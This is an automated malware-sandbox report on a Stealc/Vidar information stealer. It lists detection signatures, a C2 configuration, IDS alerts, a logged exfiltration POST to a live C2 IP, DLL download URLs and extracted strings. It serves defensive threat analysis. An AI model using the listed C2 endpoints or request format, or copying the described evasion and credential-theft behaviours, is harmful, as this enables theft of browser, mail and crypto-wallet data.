Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532853
MD5:	bb5a205420d330a463af2accf2fadee5
SHA1:	3833856b3ff0c76309185e0dd43a44af646bda27
SHA256:	50d69450bffd0161f1b7ccb2628fe4c956b58ecb577262961de90f95c0a61c41
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BB5A205420D330A463AF2ACCF2FADEE5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2130002138.0000000005020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7112	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7112	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7112	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7112	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.810000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:12.463241+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49705	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:12.367012+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:12.690550+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:13.676631+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:12.697502+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49705	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:12.105586+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T01:53:14.126593+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:18.919582+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:20.121463+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:20.787638+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:21.333779+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:23.128788+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:23.577758+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 32 45 32 39 45 30 46 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="hwid"A02E29E0F74F4033060071------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build"doma------KJDAECAEBKJJJKEBKKJD--

Source: file.exe, 00000000.00000002.2321619295.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37.com
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllV
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll(
Source: file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllB
Source: file.exe, 00000000.00000002.2321619295.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllU
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll$A
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllRA
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/JM$n
Source: file.exe, 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php:
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpge
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpimple-storage.json
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm-LTC
Source: file.exe, 00000000.00000002.2321619295.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.2321619295.0000000000F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2333473274.000000001D769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2345776193.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2338716938.0000000029832000.00000004.00000020.00020000.00000000.sdmp, KFCFBFHIEBKJKFHIEBFB.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2212948932.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, CAAAFCAK.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2293140895.000000002FA05000.00000004.00000020.00020000.00000000.sdmp, FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2293140895.000000002FA05000.00000004.00000020.00020000.00000000.sdmp, FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2293140895.000000002FA05000.00000004.00000020.00020000.00000000.sdmp, FCFHJKJJJECGDHJJDHDAAAFBKF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910

